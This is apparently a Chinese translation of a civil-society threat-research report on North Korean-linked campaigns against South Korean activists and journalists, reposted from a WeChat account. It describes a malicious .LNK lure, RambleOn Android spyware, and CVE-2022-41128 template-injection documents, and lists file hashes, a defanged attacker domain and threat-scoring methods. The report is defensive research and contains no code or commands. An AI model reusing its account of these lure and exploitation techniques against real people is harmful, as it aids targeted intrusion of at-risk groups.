2023 年 8 月 28 日，我在本研究中与之合作的一家组织向我发送了一个带有高度针对性的内容诱饵的样本。记者收到了一名活动人士的电子邮件，该活动人士通过一个冒充该组织成员的地址与该组织联系，并附有恶意文档。该文档为 .LNK 格式，执行后会加载恶意 powershell 命令和与该组织相关的合法 DOCX。我在这里记录了分析：

https://www.0x0v1.com/reverse-engineering-superbear-rat/

5.2.2：OS X 恶意软件活动

在这项研究中，我没有发现任何 OS X 恶意软件实例。这种缺失归因于我合作的组织中 Mac 系统的使用有限，再加上威胁行为者通常不针对 Mac 用户。尽管如此，这并不意味着韩国没有针对使用 MacBook 的活动人士的攻击。必须承认，安全形势是动态的，虽然我的数据集没有捕捉到与 OS X 相关的威胁，但警惕和全面的安全措施对所有操作系统来说仍然至关重要。

5.2.3：移动恶意软件活动

RambleOn 间谍软件

2022 年，我发现了一项被归类为 RambleOn 的 Android 恶意软件活动。此分析的完整报告可在此处找到：

https://www.0x0v1.com/rambleon-android-malware-december-2022/

这是朝鲜威胁行为者针对报道朝鲜事务的记者发起的一次引人注目的活动。我在 2022 年 RightsCon 和 2022 年亚太数字权利 (DRAPAC) 大会上讨论了这一恶意软件的发现和研究。下面简要展示了该恶意软件的运行方式：

图 11：RambleOn 流程

APT37 对 ROKRAT 和 RambleOn Android 恶意软件的工程设计

2017 年首次发现 ROKRAT 时，它的主要功能是后门和植入程序，便于远程访问设备并部署额外的有效载荷。到 2019 年，ROKRAT 经过了重大改造，整合了增强的间谍软件功能，例如窃取短信和录音数据，以及更新的命令和控制 (C2) 机制。从简单的后门/植入程序到复杂的间谍软件的转变凸显了 APT37 不断开发和传播基于 Android 的恶意软件。这一演变构成了将此恶意软件归类为 RambleOn 的基础，突显了威胁行为者越来越专注于部署具有高级间谍功能的 Android 恶意软件。

我对这种恶意软件及其演变进行了进一步研究，并在自己的报告《朝鲜 Android 间谍软件的演变》中对其演变进行了技术分析：

https://www.0x0v1.com/the-evolution-of-apt37s-rokrat-rambleon-android-spyware/

5.3：CVE

在研究中，我发现 CVE-2022-41128 被用来试图攻击参与这项研究的许多组织。

CVE-2022-41128 于 2022 年 11 月 8 日收到 Microsoft 的修补程序。Microsoft 关于该漏洞的声明表明，它需要使用受影响版本的 Windows 的用户访问恶意服务器。该漏洞需要托管特制的服务器共享或网站。但是，攻击者无法强迫用户直接访问此特定的服务器共享或网站。相反，他们需要说服用户（通常是通过诱人的电子邮件或聊天消息）自愿访问服务器共享或网站。

Google 研究人员发现，该漏洞存在于 Internet Explorer 的 JavaScript 引擎“jscript9.dll”中。攻击者可以利用此漏洞在呈现攻击者控制的网站时执行任意代码。

与此同时，谷歌研究人员注意到，多名韩国用户向 VirusTotal 提交了恶意 Microsoft Office 文档。这些文档与我首次发现攻击并提交给谷歌时恢复的文档类似。这些文档采用与韩国政治和教育相关的主题来引诱受害者并启动富文本文件 (RTF) 远程模板的下载，随后获取远程 HTML 内容。

要下载远程 RTF 模板，用户必须禁用文档的受保护视图。漏洞会在启动前验证 cookie 的设置，并在执行前后与 C2 服务器通信。提供的 shellcode 使用自定义哈希算法来解析 Windows API。此外，它会在继续下载下一阶段之前清除 Internet Explorer 缓存和历史记录，从而消除所有漏洞利用证据。

尽管进行了广泛的调查，研究人员仍无法确定该活动的最终有效载荷。

在我的分析中，我发现了两个包含以下诱饵的文档：

图 11：CVE-2022-41128 的文档诱饵

一旦下载并打开，该文档将从域“ms-office[.]services”执行模板注入攻击。

我在研究中确定的样本如下：

文件名 전례 없는 강공 도발 설문지 .doc
MD5 44b3f46a370faf94cc51386b4ccaab83
SHA1 5de4215ba91bd52ae7371a049c23c8239302f3a5
SHA256 c49b4d370ad0dcd1e28ee8f525ac8e3c12a34cfcf62ebb733ec74cca59b29f82

Filename 인권 설문지.docx
MD5 83b97826c43808c5caa1b69c9c7cbeb0
SHA1 375f71617fa5171a7ed24dacc1fd7f632a55eaab 
SHA256 6e3d7cdb6a506eba10f719c2ad5e5ef3d9a6bc84fb14789aa7c871200aa52816

恶意软件威胁检测和有效性，与朝鲜半岛有关的恶意软件似乎是大型科技公司代表性不足的地区。我认为，由于大量专注于 AV 和威胁检测的大型科技公司不太关心该地区针对民间社会团体的威胁行为者的威胁。对于像 Lazarus 组织这样的威胁行为者，它们来自与许多针对韩国民间团体的威胁行为者相同的地区，检测效率要高得多。这似乎是因为像 Lazarus 组织这样的组织针对的是西方。因此，认为 AV 供应商主要关注针对西方的威胁行为者，而不是韩国等地区的少数群体，这并非不合理。这项研究的目的最终是强调需要对韩国的民间社会团体进行更有针对性的威胁情报研究，以保护他们。在我的调查中，我总共发现了 23 个恶意负载。在 23 个恶意负载中，截至 2024 年 6 月，有 15 个被多家防病毒供应商识别，而 8 个未被发现。如果我查看 I RambleOn 研究中确定的 7 种有效载荷，它们目前（2024 年 6 月）在防病毒供应商中的平均检测率为 24.57/63.57。然而，情况并非总是如此。

当我在 2022 年 12 月发表研究成果时，AV 供应商对恶意负载的检测率通常低于 5。下面显示了此负载检测效率的提升。

图 12：RambleOn 有效载荷（2022 年 12 月）

图 13：2024 年 3 月 RambleOn 有效载荷

这些发现不仅导致发现了一种新型 Android 恶意软件，该恶意软件由一个国家资助的行为者针对韩国的民间社会，而且还提高了反病毒软件检测和应对此类威胁的效率。由于这项研究是由一个人进行的，因此它显示了直接与处于危险中的人合作并进行深入的技术威胁研究的力量。我认为，这是民间社会资金不足和资源匮乏的领域，需要进一步关注。这个例子提出了这样的论点：如果谷歌和微软等大型科技组织没有积极检测威胁并减轻威胁，它们可能无法最好地防御这些风险。解决方案需要非营利组织建立威胁研究计划，以最好地应对对民间社会的威胁。

5.5：内容分析

在我研究期间记录的 101 起事件中，共有 98 起是通过电子邮件向我合作的 CSO 发起的。其中 2 起事件是手机信息。在对威胁行为者初始通信内容进行分析时，威胁行为者试图向受害者发送或进行社交工程，我发现大多数初始发送内容与技术支持有关。许多技术支持电子邮件与我跟踪的威胁组织 UCID902 发起的威胁活动有关，我将在本报告的下一部分进一步讨论。在所有技术支持电子邮件案例中，我看到这些活动都是大规模分发的。我观察到与我合作的 CSO 中同一项活动的观察表明了这一点，此外，我还在 Virus Total 和 URLScan 等威胁情报平台上进行了观察。我观察到的电子邮件内容的第二和第三大类与政治或政府有关（大多数与朝鲜有关的问题）以及与朝鲜有关的公民社会/人权问题。总的来说，我认为这些活动具有高度针对性，并且在受害者中独一无二。只有在少数与政治、政府、公民社会和人权相关的电子邮件中，我看到多名受害者收到同一封电子邮件。下面，我提供了这些电子邮件内容的一些示例以供审查。

图 14：饼状图展示了威胁行为者对电子邮件/消息诱饵内容上下文的细分

图 15：与技术支持相关的电子邮件示例

图 16：与朝鲜有关的电子邮件示例

6. 技术成熟度

在本研究过程中，我试图利用公民实验室的目标威胁指数评分来支持我们进行 I 数据分析（https://citizenlab.ca/2013/10/targeted-threat-index/）。目标威胁指数 (TTI) 是一种旨在评估针对民间社会组织和个人的有针对性数字威胁风险的工具。TTI 对于经常面临复杂网络攻击的人权捍卫者、记者和活动家等群体尤其重要。

TTI 旨在提供一种系统的方法来量化和了解有针对性的数字威胁的风险。这有助于组织和个人：

• 评估他们的脆弱性：了解他们对不同类型的数字攻击的敏感性。

• 优先防御：分配资源并实施措施来防御最严重的威胁。

• 提高认识：强调公民社会面临的数字风险，以促进更广泛的认识和支持。

TTI 分数是根据一系列因素计算得出的，包括：

• 威胁行为者能力：潜在攻击者可用的技能和资源。这包括他们使用复杂恶意软件、进行社会工程攻击和利用漏洞的能力。

• 目标定制：特定个人或组织被针对的可能性有多大。这可能受到其工作性质、公众形象以及所处理信息的价值的影响。

• 技术复杂程度：当前实施的网络安全措施水平。这考虑了加密的使用、安全通信实践以及网络安全培训等因素。

使用 TTI 映射，我根据以下值计算 TTI 分数：

• （分数0）

非针对性，例如垃圾邮件或以经济为目的的恶意软件。

• （分数1）

有针对性但非定制化。发送的消息。

明显是虚假的，几乎无需验证。

• （分数2）

针对性强，定制性差。内容一般与目标相关。可能看起来有问题。

• （分数3）

有针对性和定制化。可以使用真实的

人/组织或内容来说服目标用户该消息是

合法的。内容与目标用户特别相关，并且看起来合法。

• （分数4）

有针对性且定制性强。使用真实的

人/组织和内容来说服目标邮件是

合法的。可能直接向收件人发送。内容

与目标特别相关，看起来合法，并且可以被外部引用

（例如通过网站）。可能是从被黑客入侵的帐户发送的。

• （分数5）

针对性强，使用敏感数据进行高度定制。

针对个人进行定制，可能使用与

目标直接相关的内部/敏感信息。

然后可以使用以下模式将这些值乘以技术复杂性乘数：

• （分数1）

该样本不包含任何代码保护措施，如打包、混淆（例如，C2 名称或其他有趣的字符串的简单旋转）或反逆向技巧。

• （分数1.25）

该样本包含简单的保护方法，例如

以下方法之一：使用可公开获得的工具（其中可以使用逆向方法，例如 UPX 打包）进行代码保护；简单的反逆向技术，例如不使用导入表或调用 IsDebuggerPresent()；在存在 AV 软件的情况下自行禁用。

• （分数1.5）

该样本包含多种次要的代码保护技术（反逆向技巧、打包、VM/逆向工具检测），需要一些低级知识。此级别包括恶意软件，其中包含程序核心功能的代码仅在内存中解密。

• （分数1.75）

该样本包含次要代码保护技术以及至少一种高级保护方法，例如 rootkit功能或自定义虚拟化打包程序。

• （分数2）

该样本包含多种高级保护技术，例如rootkit功能，虚拟化加壳器，多种反逆向技术，显然是由专业的软件工程团队设计的。

在这项研究中，我评估了 2021 年、2022 年和 2023 年记录的 101 起事件，并用 TTI 分数对它们进行了分类。我发现大多数事件都是针对我接触过的受害者的。我发现大多数威胁要么没有定制，要么定制程度很差。这表明，针对韩国民间社会团体的攻击者通常使用广泛的非特定技术来攻击他们。然而，有相当一部分威胁是定制的，少数威胁非常复杂，专门用于使用敏感或获取的数据来攻击受害者。这种分布表明，韩国民间社会的威胁形势多种多样，根据威胁行为者的不同，攻击者的复杂程度也不同。

图 17：全部 101 个事件的 TTI 细分

进一步分析技术复杂度乘数；我发现大多数攻击的技术复杂度并不高。这些攻击通常由非技术复杂度的样本或不包含恶意软件样本的事件组成。9 个事件包含复杂度乘数，其中 5 个事件非常先进。通常，我发现在高度复杂的攻击实例中，恶意软件样本是专门为该活动定制的，并且通常是新颖的。表明威胁行为者为攻击投入了大量精力。此外，2 个事件展示了次要的代码保护，而另外 2 个事件采用了简单的保护措施。

我发现已知威胁组织（如 APT37 和 Kimsusky）进行的攻击通常包含高度复杂的恶意软件操作。而更通用的凭证收集活动（例如 UCID902 进行的攻击）（本报告后面将讨论）则范围广泛且通用。这表明，威胁行为者针对韩国民间社会团体的攻击复杂程度各不相同，他们的作案手法或任务也不同。

图 18：基于 TTI 得分的事件复杂度

绘制整个研究中事件的 TTI 分数，可以提供宝贵的见解，并了解对公民社会的影响。分析显示，TTI 分数较低的事件始终具有广泛、通用和非复杂攻击的特征。在研究的三年期间，TTI 分数为 2 仍然很普遍，表明攻击者持续尝试以最低限度的定制方式进行定位，例如通过电子邮件欺骗等方法。值得注意的是，在 2022 年，出现了一个独特的威胁行为者，我将其识别为 UCID902（将在本报告的后面部分讨论）。该行为者展示了持续的低复杂度攻击，尽管具有针对性且缺乏定制，但通常产生 TTI 分数为 1。我发现，一般来说，我没有观察到许多不针对特定受害者的事件。这种观察可能是因为非针对性攻击（例如凭证收集活动）很容易被电子邮件过滤器和反网络钓鱼/病毒扫描检测到。数据显示，从 2022 年初开始，TTI 得分为 3 和 4（代表中度定制或复杂的攻击）的数量有所下降，与此同时，得分为 1 和 2 的更普遍的攻击数量有所增加。此外，在 2022 年下半年和整个 2023 年，高度复杂和技术性的攻击明显增加。这一趋势表明，针对韩国民间社会的威胁行为者的战略转变是增加大规模分布但特异性较低的攻击，同时增加复杂和技术先进的行动的频率。

由于大多数事件都与朝鲜境内的威胁行为者有关，因此讨论朝鲜针对韩国公民社会的网络行动具有重要意义。观察到的高度复杂和技术攻击的增加，以及更猛烈的大规模分布式凭证收集活动的出现，符合朝鲜已知的能力和战略目标。这表明网络事件的增加与朝鲜国家支持的活动之间存在潜在关联。了解这些动态对于制定强有力的防御和应对策略至关重要，以保护韩国公民社会团体免受朝鲜境内敌对国家行为者不断演变的网络威胁。

图 19：按样本提交日期进行的 TTI 评分

7：聚类分析

相关性结果与分析

通过在 MISP 等系统中收集事件并添加属性，我能够将事件中的各个属性关联在一起，从而深入了解更广泛的威胁活动，并提供对民间社会有效响应和教育策略至关重要的额外背景信息。这种关联使我们能够识别威胁行为者在多个事件中使用的模式、策略和技术。例如，通过链接不同事件中的类似恶意软件签名、命令和控制基础设施或特定攻击方法，分析师可以辨别出存在协调一致的活动，而不是孤立事件。此外，关联属性有助于了解策略随时间的演变并尽早发现新出现的威胁。这种能力对于主动威胁情报至关重要，使我们能够预测潜在的攻击媒介，优先考虑缓解措施，并根据我支持的民间社会团体的关系相应地加强防御。此外，通过 MISP 等平台在民间社会社区内共享和关联威胁数据，组织可以共同增强其对可能针对韩国民间社会等部门的复杂和持续的网络威胁的抵御能力。

图 20：使用 MISP 的关联示例

这些结果的收集和分析包括本研究中使用的以下步骤和方法：

• 数据收集：从各种来源（例如安全日志、入侵检测系统、威胁情报源和事件报告）收集和接收相关事件数据。这些数据可能在民间社会团体的 I 审计期间收集，也可能由向我们提交样本的合作团体收集。这些数据包括入侵指标 (IOC)，例如 IP 地址、域名、文件哈希、电子邮件地址和网络事件期间观察到的行为模式。

• 规范化：对收集的数据进行标准化和规范化，以确保不同来源之间的一致性和兼容性。此步骤有助于准备数据以进行有效的关联和分析。

• 钻石模型元素：

• 行为者：识别网络活动背后的威胁行为者或团体。这涉及根据策略、基础设施和历史模式将观察到的行为归因于已知的威胁行为者。

• 基础设施：分析威胁行为者使用的命令和控制基础设施，例如域、IP 地址和托管提供商。映射基础设施有助于将不同的事件与共同的威胁行为者联系起来。

• 受害者：了解网络事件的目标受害者或受影响的行业。这包括分析目标组织或个人的概况、地理位置和行业部门。

• 能力：评估威胁行为者使用的技术能力和工具，例如恶意软件变体、漏洞利用技术和网络钓鱼策略。了解能力可以洞悉威胁行为者的复杂性和意图。

• 关联性：应用钻石模型框架关联不同元素（参与者、基础设施、受害者、能力）之间的属性。例如，将多个事件中使用的常见基础设施或策略联系起来可以表明这是一次协调一致的活动，而不是孤立的攻击。

• 情境化：将其他背景信息整合到关联过程中，考虑地缘政治紧张局势、威胁行为者的动机（政治、金融、间谍活动）以及行业特定的漏洞等因素。情境化增强了对推动网络攻击的战略目标的理解。

• 可视化与交流：利用可视化工具以图形方式表示通过钻石模型分析确定的关系和模式。可视化有助于我们了解威胁元素之间的相互作用以及对目标实体的影响。

• 威胁情报共享：通过 MISP 等平台与值得信赖的合作伙伴和网络安全社区共享相关威胁数据和分析结果。协作共享促进了集体防御努力，并能够主动缓解不断演变的威胁。

• 持续改进：持续监控和分析相关数据，以检测新出现的威胁和不断发展的策略。定期更新钻石模型分析方法可确保威胁归因和缓解策略的相关性和准确性。

使用这种方法，我能够提高我观察、响应和有效归因威胁的能力。这支持了我响应和减轻威胁以及增强恢复能力的能力。使用这种方法，除了支持我们的效率、教育计划和事件响应能力之外，我还能够识别出一个我归类为 UCID902 的威胁行为者的显著出现。通过关联基础设施、受害者和能力等事件元素，我能够了解未知威胁行为者开展的凭证收集活动的演变。这个威胁行为者与一个名为 Kimsuky 的威胁组织相关的基础设施有一个重叠，该组织归属于朝鲜国家。虽然在许多情况下，UCID902 的事件会归咎于 Kimsuky，但我发现基于钻石模型的作案手法和方法存在明显差异。

7.1：威胁行为者UCID902

自 2021 年开始研究 CSO 以来，我开始跟踪来自未知行为者的持续活动，这些活动与 I 钻石模型分析的许多方面相关。我用 I 威胁标签跟踪了此活动：UCID902（未识别集群 ID - 902）。根据我的分析，我得出结论，该行为者进行的攻击表明，他们继续针对人权组织和与朝鲜人权倡导有关的活动人士。UCID902 调查 结果的技术报告和披露可在此处找到：

https://www.0x0v1.com/ucid902-uncovering-nation-state-watering-hole-credential-harvesting-campaigns-targeting-human-rights-activists-by-apt-threat-group-ucid902-2023/

8：相关性分析的学习及其在公民社会中的应用

通过跟踪和记录直接与民间社会受害者合作观察到的事件，我相信我们可以识别私营部门组织进行的遥测跟踪可能遗漏的特定攻击活动。通过这样做，我们能够将观察到的针对我与之合作的 CSO 的攻击事件关联起来，并对活动、受害者和动机进行更广泛的背景分析。重要的是，作为一个民间社会团体，我们能够观察和预测活动，这使我们能够进一步教育受害者并更快地对事件做出反应。

这项工作的意义在于，像我们这样的民间社会团体可以直接与受害者打交道。与私营部门实体不同，我们可以直接接触受害者的经历、设备、基础设施和见解，这使我们能够直接观察和应对新出现的威胁。这种积极主动的态度不仅使我们能够教育潜在的受害者，而且还提高了我们迅速有效地应对事件的能力。通过实施可操作的威胁情报收集和相关性分析，我们可以减轻损害、及时提供支持，并在我们服务的社区内建立复原力。

可操作的威胁情报和关联情报的能力是民间社会有效威胁研究的重要组成部分。通过将原始数据转化为可操作的见解，我们可以识别模式、预测未来攻击并了解特定威胁的更广泛影响。情报关联使我们能够将不同的事件联系起来，揭示对手使用的潜在战术、技术和程序 (TTP)。这种整体观点对于开发针对处于危险中的人的防御机制以及在攻击活动影响受害者之前先发制人地应对攻击活动至关重要。可操作威胁情报提供的精确度和深度使我们能够超越被动措施，为民间社会培养主动的安全态势，从而能够在威胁萌芽阶段预测和消除威胁。

9：结论

这项研究再次证明了民间社会组织在应对网络威胁方面发挥的宝贵作用。通过直接与受害者合作，民间社会组织拥有独特的能力来检测、分析和缓解传统网络安全框架可能忽略的攻击。他们能够访问实时受害者数据和基础设施，这使他们处于主动威胁情报的最前沿。

本研究结果强调了可操作情报和相关性分析在预测和消除数字威胁方面的必要性。民间社会团体可以先发制人地阻止攻击活动，教育高危人群，并增强其所服务社区的抵御能力，而不是被动应对。

展望未来，民间社会、学术界和网络安全专家之间加强合作对于推进集体数字防御战略至关重要。对民间社会主导的安全研究和网络安全实验室计划的投资将进一步增强这些组织的能力，保护人权捍卫者、记者和活动人士免受复杂且不断发展的网络威胁。

通过采取积极主动的安全态势，公民社会可以改变数字冲突的平衡——确保那些维护正义和真理的人在日益恶劣的网络环境中继续受到保护。

原文始发于微信公众号（Ots安全）：针对性威胁研究 - 韩国和朝鲜（韩国 3 年威胁研究的细目）